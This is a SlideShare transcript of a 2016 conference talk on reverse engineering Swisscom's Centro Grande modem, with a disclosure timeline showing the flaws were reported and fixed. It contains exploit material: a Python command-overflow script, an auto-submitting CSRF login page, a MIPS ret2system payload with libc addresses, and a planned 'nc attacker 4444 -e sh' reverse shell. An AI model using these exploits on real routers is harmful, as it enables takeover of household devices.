SlideShare ist ein Scribd-Unternehmen logo

Reverse engineering Swisscom's Centro Grande Modem

Cyber Security Alliance
Cyber Security Alliance

Alain Mowat & Thomas Imbert, Cyber Security Conference 2016

Software
1 von 38
Downloaden Sie, um offline zu lesen
Reverse engineering Swisscom’sReverse engineering Swisscom’s Centro Grande modemsCentro Grande modems Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
2whoami › Alain Mowat (@plopz0r) › Head of Audit division at SCRT › Pentest › Code review › Trainings › Mostly a Web App guy › Member of 0daysober CTF team › Watch other people exploiting cool vulns
3Background › Why look into the Swisscom modems? › Why this talk? › I don’t actually own a Swisscom modem › Made it a bit harder to study...
4Attack Surface › ADB# show netstat tcp 0 0 192.168.1.1:50602 0.0.0.0:* LISTEN tcp 0 0 127.0.0.1:9034 0.0.0.0:* LISTEN tcp 11 0 192.168.1.1:8080 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:53 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:22 0.0.0.0:* LISTEN tcp 0 0 192.168.1.1:23 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:7547 0.0.0.0:* LISTEN udp 0 0 0.0.0.0:9090 0.0.0.0:* udp 0 0 127.0.0.1:15000 0.0.0.0:* udp 0 0 0.0.0.0:53 0.0.0.0:* udp 0 0 0.0.0.0:323 0.0.0.0:* udp 0 0 0.0.0.0:67 0.0.0.0:* udp 0 0 0.0.0.0:68 0.0.0.0:* udp 0 0 178.199.180.148:5060 0.0.0.0:* udp 0 0 192.168.1.1:5351 0.0.0.0:* udp 0 0 0.0.0.0:1900 0.0.0.0:* udp 0 0 192.168.1.1:47863 0.0.0.0:* udp 0 0 0.0.0.0:123 0.0.0.0:* udp 0 0 ff02::1:2:547 :::* udp 0 0 :::53 :::* udp 0 0 :::323 :::* udp 0 0 :::123 :::* raw 0 0 0.0.0.0:2 0.0.0.0:* 2 raw 0 0 0.0.0.0:6 0.0.0.0:* 6 raw 0 0 :::58 :::*
5Attack Surface › ADB# show processes 256 0 2040 S logd 259 0 1308 S klogd -c3 271 0 832 S ec 343 0 3236 S cm 350 0 0 SW [dsl0] 363 0 0 SW [bcmsw] 364 0 0 SW [bcmsw_timer] 365 0 0 SW< [linkwatch] 5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168 6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300 6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf 7362 0 1000 S dhcps /tmp/dhcps.conf 7910 0 764 S dns 8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4 8026 0 736 S /bin/wpspbc 8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf 9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot 9177 0 2940 S cwmp 9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh 9353 0 884 S ec 9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300 11846 0 1332 S /bin/sh DHCPv4Client.sh 11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C 14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p 15287 0 3576 S voip 15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro 15923 0 1056 S N chronyd -f /tmp/chrony.conf 16770 0 820 S radvd 16812 0 2036 S dibbler-server start
6Finding the firmware › Locate the firmware › https://www.swisscom.ch/en/residential/help/device/internet-router/centro- grande.html › Vx226x1_61400.sig › Version at the time › 6.14.00
7Extracting the firmware › Binwalk (https://github.com/devttys0/binwalk) › Firmware modification kit › ./extract-firmware.sh
8CPE WAN Management Protocol › Also known as TR-069 › Protocol that defines how to manage « Customer-premises Equipment » › cwmp binary › Listens to 0.0.0.0:7547 › iptables rule allows access only from certain Swisscom subnets
9Web interface › Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html) › If a binary file is accessed through the web interface, it executes it › Directory traversal → Code Exec in version 1.9.3
10Web interface › Mostly managed by a CGI called ui
11Emulating the device › OpenWRT (https://openwrt.org/) › Linux distribution for embedded devices › Qemu (http://wiki.qemu.org/Main_Page) › Machine emulator and virtualizer
12Configuring OpenWRT › make menuconfig › MIPS target › Add all debugging and networking tools › Cross-compile nhttpd › Generate ramdisk › Copy Swisscom firmware files to the image › Run image with qemu › qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini- tramfs.elf -net tap -net nic -nographic -m 2048
13Setting up the image › nhttpd server serverroot /www serveradmin webmaster@adbglobal.com servermimes conf/mimes docroot /www/htdocs docindex lanhosts logpid /tmp/logs user nobody disablehttp 0 notfound 501 sslport 443 sslcert /etc/certs/server.crt sslcertkey /etc/certs/server.key sslcertca /etc/certs/ca.pem sslcertreq * serverlisten 0.0.0.0 servername localhost
14Web interface
15YAPL ?
16Web request overview nhttpd swc_login.yapl swc_common.yapl swc_firewall.yapl ... ui cm POST /ui/swc/login Environment setup Configuration command Get corresponding YAPL « script »
17Configuration manager › Used to view and modify the device’s configuration › Bound to localhost:9034 › Also /tmp/cmctl socket › Several possible commands › GETO, GETV, … › SET, SETM, … › RESET, REBOOT, ... › DUMP, EXPORT, ...
18Mandatory IDA graph
19Configuration manager › Main loop listen on localhost port 9034 socket = accept while 1: input = socket.recv(16384) handleRequest(input) def handleRequest(input): type = validateRequestType(input) params = validateRequestParams(input) callTypeHandler(params)
20Configuration Manager
21Finalizing the image setup udhcpc -i br-lan cm touch /tmp/cmctl chmod 777 /tmp/cmctl nhttpd -c /www/nhttpd.cfg nc localhost 9034 DOM Device /etc/cm/tr181/dom/ DOM InternetGatewayDevice /etc/cm/tr098/dom/ CONF /etc/cm/conf/ ADD InternetGatewayDevice.WANDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1 SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1 SET Device.IP.Interface.1.Status Up SET Device.Ethernet.Link.1.Name br-lan SET Device.DeviceInfo.SerialNumber 123456 SET Device.IP.Interface.1.X_ADB_Upstream true SET Device.IP.Interface.1.X_ADB_TR098Reference InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
22Running image
23Configuration manager › Special syntax › Similar to SQL in certain ways › SELECT =~ GETV › UPDATE =~ SET › Conditions › GETO A.B.C.[Test=1] › GETO A.B.C.[Test~1] › GETO A.B.C.[Test!1]
24Vulnerability #1 : Command overflow › Each call to recv is treated as a new command › By sending more than 16384 characters, we can craft a new configuration command › Logging in to the web interface generates a call to the configuration manager that looks like this › GETO Users.User.[Username=ATTACKER_CONTROLLED] › By providing a long username, we can exceed the 16348 limit and gene- rate a new request within the configuration manager › Allows complete control over the device › Change passwords › Allow remote access › ...
25Vulnerability #1 : Command overflow ui cm GETO Users.User.[Username=A AAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAA […] AAAAAAAAAAAAAAAAAAAAAAAAAAA REBOOTn recv(16384) recv(16384) send process(‘GETO Users……’) process(‘REBOOT’)
26Exploit #1 : Command overflow from requests import post payload = dict() payload['userName'] = ( 16358 ) * 'a' + 'REBOOT' + 'n' payload['userPwd'] = 'a' payload['login'] = 'Login' payload['language'] = '' while 1: r = post('http://192.168.1.1/ui/swc/login/index', data=payload) D EM O
27Vulnerability #2 : Login CSRF › Use CSRF to exploit someone else’s device <html> <body> <form method="POST" action="http://192.168.1.1/ui/swc/login/index"> <input type="hidden" name="userName" value="aaaaaaaaaa[...]aaaREBOOT%0a"/> <input type="hidden" name="userPwd" value="a"/> <input type="hidden" name="login" value="login"/> <input type="hidden" name="language" value=""/> </form> <script> document.forms[0].submit(); </script> </body> </html>
28Exposed web interfaces – Centro Business
29Vulnerability #3 : Buffer overflow(s) › Buffer overflow when parsing the name of XML files when performing certain commands (CONF, DOM, …) › Requirements › Arbitrarily-named XML file on the device › file and folder are both limited to 4096 in size parseFilesinFolder(folder): char path[4096]; files = scandir(folder) for file in files: if file ends with ".xml": strncat(path,folder,4096) strncat(path,file,4096) parseFile(filename)
30Exploit #3 : Creating the XML file › The PATHSAVE command takes 2 arguments › An XML filename › Property that needs to be saved › PATHSAVE /tmp/test.xml Users.User.1.Password › Can use this to write an arbitrarily-named file on the device › Exploit can then be triggered by prepending folder with lots of / › CONF /////////////////////////////////////[…]/tmp/exploit.xml
31Exploit #3 : Exploiting a MIPS binary Prologue Epilogue
32Exploit #3 : Exploiting a MIPS binary › No ASLR on the device › No NX › No canaries › A version of nc with the -e switch is present on the device › Try to call system(‘nc attacker 4444 -e sh’) › Arguments are not passed on the stack though, but in registers › $a0 › $a1 › …
33Exploit #3 : ret2system › Quick analysis gives address of system in libUclibc (Centro business) : › Libuclibc base : 0x2aaf8000 › System is at offset : 0x54610 › Real address : 0x2ab4c610 › Need a gadget in order to get our argument to system in $a0 › Make $a0 point to address in the stack › $s0 is also under our control
34Exploit #3 : ret2system /tmp/aaaaaaaaaaaaaaaax2axb4xc6x10bbbbbbbbbbbbbbb bbbbbbbbbbbbbbbbbx2axb1xcaxacaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaareboot; #bbbb.xml $ra → gadget $s0 → system command 64 * ‘a’ (addiu $a0,$sp,64)
35Exploit #3 : Full exploit D EM O
36Disclosure timeline › 9 September 2015 : Initial disclosure to Swisscom › 10 September 2015 : Vulnerabilities acknowledged by Swisscom › 11 September 2015 : Vendor notified (ADB) › 18 September 2015 : Confirmation of vulns & quick fix available › 24 September 2015 : Test of quick fix › 29 September 2015 : Contact with ADB › October 2015 : Rollout of quick fix to all devices › January 2016 : Status full fix : › Centro grande : 100 % › Centro Business 1.0 : 50 % › Centro Business 2.0 : 100 % › 13 June 2016 : Disclure
37Swisscom bounty › Combination of flaws rewarded with 3’000 CHF › Donated to the Ligue Vaudoise contre le Cancer › Swisscom Bug Bounty program is up & running › Talk is tomorrow afternoon :)
38Conclusions › Attackers › Look into other processes on the modem › miniupnp › voip › Embedded devices are found everywhere nowadays › Huge attack surface › Less people reversing firmwares than searching for XSS › Defenders › Consider 0days in your penetration tests › Test your defense in depth › Test your ability to detect breaches

Empfohlen

Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDPDaniel T. Lee
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceSUSE Labs Taipei
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialDalton Valadares
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopSaumil Shah
 
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)志弘 李
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardAnne Nicolas
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machineAlexei Starovoitov
 
1 intro to_dpdk_and_hw
1 intro to_dpdk_and_hw1 intro to_dpdk_and_hw
1 intro to_dpdk_and_hwvideos
 

Empfohlen

Faster packet processing in Linux: XDP
Faster packet processing in Linux: XDPFaster packet processing in Linux: XDP
Faster packet processing in Linux: XDPDaniel T. Lee
 
eBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceeBPF Trace from Kernel to Userspace
eBPF Trace from Kernel to UserspaceSUSE Labs Taipei
 
OPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialOPTEE on QEMU - Build Tutorial
OPTEE on QEMU - Build TutorialDalton Valadares
 
ARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopARM IoT Firmware Emulation Workshop
ARM IoT Firmware Emulation WorkshopSaumil Shah
 
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)
Fortinet Fortigate 60D 中文安裝手冊 ( Ver 5.2.3)志弘 李
 
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardKernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime Ripard
Kernel Recipes 2017 - An introduction to the Linux DRM subsystem - Maxime RipardAnne Nicolas
 
BPF - in-kernel virtual machine
BPF - in-kernel virtual machineBPF - in-kernel virtual machine
BPF - in-kernel virtual machineAlexei Starovoitov
 
1 intro to_dpdk_and_hw
1 intro to_dpdk_and_hw1 intro to_dpdk_and_hw
1 intro to_dpdk_and_hwvideos
 
Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureRyo Jin
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
DPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet ProcessingDPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet ProcessingMichelle Holley
 
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDPDockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDPThomas Graf
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101SUSE Labs Taipei
 
HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)Linaro
 
A whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizerA whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizerNikita Popov
 
Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)Macpaul Lin
 
Kernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stackKernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stackAnne Nicolas
 
Dpdk performance
Dpdk performanceDpdk performance
Dpdk performanceStephen Hemminger
 
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2Etsuji Nakai
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareC4Media
 
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in GoCapturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in GoScyllaDB
 
An Introduction to RISC-V bootflow
An Introduction to RISC-V bootflowAn Introduction to RISC-V bootflow
An Introduction to RISC-V bootflowAtish Patra
 
Qemu Pcie
Qemu PcieQemu Pcie
Qemu PcieThe Linux Foundation
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingScyllaDB
 
BPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating SystemBPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating SystemThomas Graf
 
Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modemCyber Security Alliance
 
Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSSRamses Cabello
 

Weitere ähnliche Inhalte

Was ist angesagt?

Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFBrendan Gregg
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on LabMichelle Holley
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureRyo Jin
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchlinuxlab_conf
 
DPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet ProcessingDPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet ProcessingMichelle Holley
 
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDPDockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDPThomas Graf
 
HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)Linaro
 
A whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizerA whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizerNikita Popov
 
Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)Macpaul Lin
 
Kernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stackKernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stackAnne Nicolas
 
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2Etsuji Nakai
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Andriy Berestovskyy
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareC4Media
 
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in GoCapturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in GoScyllaDB
 
An Introduction to RISC-V bootflow
An Introduction to RISC-V bootflowAn Introduction to RISC-V bootflow
An Introduction to RISC-V bootflowAtish Patra
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingScyllaDB
 
BPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating SystemBPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating SystemThomas Graf
 

Was ist angesagt? (20)

Velocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPFVelocity 2017 Performance analysis superpowers with Linux eBPF
Velocity 2017 Performance analysis superpowers with Linux eBPF
 
Intel® RDT Hands-on Lab
Intel® RDT Hands-on LabIntel® RDT Hands-on Lab
Intel® RDT Hands-on Lab
 
Linux on ARM 64-bit Architecture
Linux on ARM 64-bit ArchitectureLinux on ARM 64-bit Architecture
Linux on ARM 64-bit Architecture
 
Jagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratchJagan Teki - U-boot from scratch
Jagan Teki - U-boot from scratch
 
DPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet ProcessingDPDK: Multi Architecture High Performance Packet Processing
DPDK: Multi Architecture High Performance Packet Processing
 
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDPDockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
DockerCon 2017 - Cilium - Network and Application Security with BPF and XDP
 
eBPF maps 101
eBPF maps 101eBPF maps 101
eBPF maps 101
 
HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)HKG15-107: ACPI Power Management on ARM64 Servers (v2)
HKG15-107: ACPI Power Management on ARM64 Servers (v2)
 
A whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizerA whirlwind tour of the LLVM optimizer
A whirlwind tour of the LLVM optimizer
 
Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)Bootstrap process of u boot (NDS32 RISC CPU)
Bootstrap process of u boot (NDS32 RISC CPU)
 
Kernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stackKernel Recipes 2019 - XDP closer integration with network stack
Kernel Recipes 2019 - XDP closer integration with network stack
 
Dpdk performance
Dpdk performanceDpdk performance
Dpdk performance
 
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
OpenStackクラウド基盤構築ハンズオンセミナー 第2日:講義No2
 
Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)Network Programming: Data Plane Development Kit (DPDK)
Network Programming: Data Plane Development Kit (DPDK)
 
XDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @CloudflareXDP in Practice: DDoS Mitigation @Cloudflare
XDP in Practice: DDoS Mitigation @Cloudflare
 
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in GoCapturing NIC and Kernel TX and RX Timestamps for Packets in Go
Capturing NIC and Kernel TX and RX Timestamps for Packets in Go
 
An Introduction to RISC-V bootflow
An Introduction to RISC-V bootflowAn Introduction to RISC-V bootflow
An Introduction to RISC-V bootflow
 
Qemu Pcie
Qemu PcieQemu Pcie
Qemu Pcie
 
New Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using TracingNew Ways to Find Latency in Linux Using Tracing
New Ways to Find Latency in Linux Using Tracing
 
BPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating SystemBPF & Cilium - Turning Linux into a Microservices-aware Operating System
BPF & Cilium - Turning Linux into a Microservices-aware Operating System
 

Andere mochten auch

Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSSRamses Cabello
 
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...SlideTeam.net
 
Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013Sharlena Wood
 
Adobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly EarningsAdobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly EarningsAdobe
 
Aimopp For Presentation
Aimopp For PresentationAimopp For Presentation
Aimopp For PresentationJinky Quizon
 
Contract - what roles we do
Contract - what roles we doContract - what roles we do
Contract - what roles we doNiomi Cowling
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרhachamd
 
Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1Rajesh Lalwani
 
Web Mining e analisi di reti sociali
Web Mining e analisi di reti socialiWeb Mining e analisi di reti sociali
Web Mining e analisi di reti socialiMariagiovanna Scarale
 
Attractions in the majestic city of Kandy
Attractions in the majestic city of KandyAttractions in the majestic city of Kandy
Attractions in the majestic city of KandyPushpitha Wijesinghe
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцыOrlovatania
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudDan Usher
 

Andere mochten auch (20)

Hacking the swisscom modem
Hacking the swisscom modemHacking the swisscom modem
Hacking the swisscom modem
 
Introduction to HTML5+CSS
Introduction to HTML5+CSSIntroduction to HTML5+CSS
Introduction to HTML5+CSS
 
The Mall of the World
The Mall of the WorldThe Mall of the World
The Mall of the World
 
BAFC233
BAFC233BAFC233
BAFC233
 
Three tier application
Three tier applicationThree tier application
Three tier application
 
весь-журнал
весь-журналвесь-журнал
весь-журнал
 
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
3 d pie chart circular puzzle with hole in center process 12 stages style 2 p...
 
Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013Charcoal drawing portfolio 2013
Charcoal drawing portfolio 2013
 
October Newsletter
October NewsletterOctober Newsletter
October Newsletter
 
Adobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly EarningsAdobe Q1 2016 Quarterly Earnings
Adobe Q1 2016 Quarterly Earnings
 
Aimopp For Presentation
Aimopp For PresentationAimopp For Presentation
Aimopp For Presentation
 
Contract - what roles we do
Contract - what roles we doContract - what roles we do
Contract - what roles we do
 
ציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחרציפיות הלקוח, תפיסת השירות של המחר
ציפיות הלקוח, תפיסת השירות של המחר
 
Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1Entrepreneurial Journeys - Part 1
Entrepreneurial Journeys - Part 1
 
Web Mining e analisi di reti sociali
Web Mining e analisi di reti socialiWeb Mining e analisi di reti sociali
Web Mining e analisi di reti sociali
 
Attractions in the majestic city of Kandy
Attractions in the majestic city of KandyAttractions in the majestic city of Kandy
Attractions in the majestic city of Kandy
 
Guia de estudio mapa
Guia de estudio mapaGuia de estudio mapa
Guia de estudio mapa
 
домашние любимцы
домашние любимцыдомашние любимцы
домашние любимцы
 
SharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the CloudSharePoint Saturday Philly - To the Cloud
SharePoint Saturday Philly - To the Cloud
 
Dropbox
Dropbox Dropbox
Dropbox
 

Ähnlich wie Reverse engineering Swisscom's Centro Grande Modem

Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPFIvan Babrou
 
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全Linux 系統管理與安全:進階系統管理系統防駭與資訊安全
Linux 系統管理與安全:進階系統管理系統防駭與資訊安全維泰 蔡
 
Crash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenCrash_Report_Mechanism_In_Tizen
Crash_Report_Mechanism_In_TizenLex Yu
 
PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22PFIセミナー資料 H27.10.22
PFIセミナー資料 H27.10.22Yuya Takei
 
Debugging Ruby
Debugging RubyDebugging Ruby
Debugging RubyAman Gupta
 
Debugging Ruby Systems
Debugging Ruby SystemsDebugging Ruby Systems
